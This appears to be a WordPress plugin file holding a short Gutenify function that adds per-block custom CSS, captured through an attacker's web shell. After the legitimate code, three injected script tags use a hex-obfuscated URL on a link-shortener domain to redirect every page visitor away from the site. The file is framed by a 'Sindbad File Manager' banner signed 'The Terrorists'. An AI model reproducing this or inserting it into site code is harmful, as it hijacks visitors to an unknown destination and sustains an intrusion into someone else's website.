Sindbad~EG File Manager
<?php
function gutenify_block_custom_css( $block_content, $block ) {
if ( ! empty( $block['attrs']['customCss'] ) && ! empty( $block['attrs']['blockClientId'] ) ) {
$pattern = '/\$selector/m';
$replacement = '.gutenify-section-' . $block['attrs']['blockClientId'];
$custom_css = preg_replace($pattern, $replacement, $block['attrs']['customCss'] );
wp_add_inline_style( 'wp-block-library', $custom_css );
}
return $block_content;
}
add_filter( 'render_block', 'gutenify_block_custom_css', 10, 2 );
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x41\x61\x64\x50\x55\x47\x6c\x30\x72\x35";</script>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists